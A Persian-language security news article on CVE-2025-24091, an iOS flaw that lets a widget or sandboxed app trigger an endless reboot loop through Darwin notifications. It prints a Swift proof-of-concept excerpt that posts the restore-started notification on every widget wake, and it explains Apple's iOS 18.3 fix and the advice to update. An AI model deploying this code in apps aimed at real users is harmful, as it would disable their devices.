خانه » آسیب‌پذیری بحرانی جدید در iOS که می‌تواند آیفون را تنها با یک خط کد از کار بیندازد!

آسیب‌پذیری بحرانی جدید در iOS که می‌تواند آیفون را تنها با یک خط کد از کار بیندازد!

توسط Vulnerbyt_News
17 بازدید
New iOS Critical Vulnerability That Could Brick iPhones With a Single Line of Code گروه والنربایت vulnerbyte

آسیب‌پذیری بحرانی جدیدی در سیستم‌عامل iOS با شناسه CVE-2025-24091 شناسایی شده که به اپلیکیشن‌های مخرب امکان می‌دهد با اجرای یک خط کد، دستگاه‌های آیفون و آیپد را به‌طور دائم از کار بیندازند.

 این نقص از سیستم اعلان‌های Darwin در لایه CoreOS سوءاستفاده کرده و با ایجاد چرخه بی‌پایان ریبوت، دستگاه را به حالت غیرقابل‌استفاده (بریک) درمی‌آورد، به‌گونه‌ای که تنها راه‌حل، بازگردانی کامل سیستم است.

این اولین آسیب‌پذیری مرتبط با سیستم Darwin در محصولات اپل نیست. پیش‌تر، شرکت Kaspersky یک آسیب‌پذیری با نام «Darwin Nuke» شناسایی کرده بود که به مهاجمان راه‌دور امکان می‌داد با ارسال بسته‌های شبکه‌ای دست‌کاری‌شده، حملات انکار سرویس (DoS) را آغاز کنند.

اعلان‌های Darwin چی هستند؟

سیستم اعلان‌های Darwin، مکانیزمی سطح پایین در CoreOS، برای تبادل پیام بین پردازش‌ها در سیستم‌عامل‌های اپل طراحی شده است. برخلاف ابزارهای شناخته‌شده‌تر مانند NSNotificationCenter، این سیستم بخشی از APIهای قدیمی بوده و در اعماق سیستم‌عامل عمل می‌کند.

هر اپلیکیشن سندباکس‌شده یا ویجت در iOS، بدون نیاز به مجوزهای خاص، قادر به ارسال این اعلان‌هاست. این اعلان‌ها می‌توانند توابع سیستمی قدرتمندی، مانند فعال‌سازی حالت Restore in Progress، را راه‌اندازی کنند.

مشخصات و نحوه اکسپلویت CVE-2025-24091

این آسیب‌پذیری با اجرای یک خط کد ساده، دستگاه را به حالت Restore in Progress می‌برد. چون هیچ فرآیند ری‌استور واقعی در جریان نیست، عملیات با شکست مواجه می‌شود و دستگاه ریبوت می‌شود.

New iOS Critical Vulnerability That Could Brick iPhones With a Single Line of Code گروه والنربایت vulnerbyte

یک محقق امنیتی اثبات مفهومی (PoC) با نام VeryEvilNotify توسعه داده که این کد را در یک افزونه ویجت پیاده‌سازی می‌کند. از آنجا که افزونه‌های ویجت به‌صورت دوره‌ای توسط iOS در پس‌زمینه فعال می‌شوند، این اکسپلویت پس از هر ریبوت مجددا اجرا شده و چرخه‌ای مداوم از اختلال ایجاد می‌کند. به رامبو، محقق امنیتی مذکور، برای کشف این آسیب‌پذیری، مبلغ ۱۷,۵۰۰ دلار به‌عنوان پاداش باگ بانتی اعطا شد.

بخشی از کد ویجت VeryEvilNotify:

				
					import WidgetKit
import SwiftUI
import notify

struct VeryEvilWidgetBundle: WidgetBundle {
    var body: some Widget {
        VeryEvilWidget()
        if #available(iOS 18, *) {
            VeryEvilWidgetControl()
        }
    }
}

/// Override extension entry point to ensure the exploit code is always run whenever
/// our extension gets woken up by the system.
@main
struct VeryEvilWidgetEntryPoint {
    static func main() {
        notify_post("com.apple.MobileSync.BackupAgent.RestoreStarted")

        VeryEvilWidgetBundle.main()
    }
}
				
			

مشخصات آسیب‌پذیری:

  • محصولات آسیب‌پذیر: دستگاه‌های آیفون و آیپد با نسخه‌های iOS/iPadOS پیش از ۱۸.۳
  • اثر حمله: انکار سرویس (DoS)
  • پیش‌نیازها: اپلیکیشن سندباکس‌شده یا ویجت بدون نیاز به مجوز خاص
  • امتیاز CVSS 3.1: بالا

شرکت اپل این نقص را در نسخه iOS 18.3 با معرفی مجوزهای جدید برای اعلان‌های حساس Darwin برطرف کرده است. اعلان‌های سیستمی اکنون باید با پیشوند com.apple.private.restrict-post. آغاز شوند و پردازش‌های ارسال‌کننده نیازمند مجوزهای محدودشده‌ای مانند com.apple.private.darwin-notification.restrict-post. هستند.

توصیه امنیتی

به تمامی کاربران آیفون توصیه اکید می‌شود که هرچه سریع‌تر به نسخه iOS 18.3 یا بالاتر به‌روزرسانی کنند. دستگاه‌هایی که از نسخه‌های قدیمی‌تر استفاده می‌کنند، همچنان در برابر این حمله آسیب‌پذیر هستند. این حمله ممکن است از طریق اپلیکیشن‌ها یا ویجت‌هایی که بی‌خطر به نظر می‌رسند، چه در App Store و چه از منابع دیگر، اجرا شود.

این مورد بار دیگر چالش‌های همیشگی امنیت در سیستم‌عامل‌های موبایل را برجسته می‌کند؛ جایی که حتی APIهای قدیمی و ساده‌ای که مورد توجه قرار نگرفته‌اند، در صورت ایمن‌سازی نادرست، می‌توانند به تهدیدی جدی تبدیل شوند.

منابع:

همچنین ممکن است دوست داشته باشید

پیام بگذارید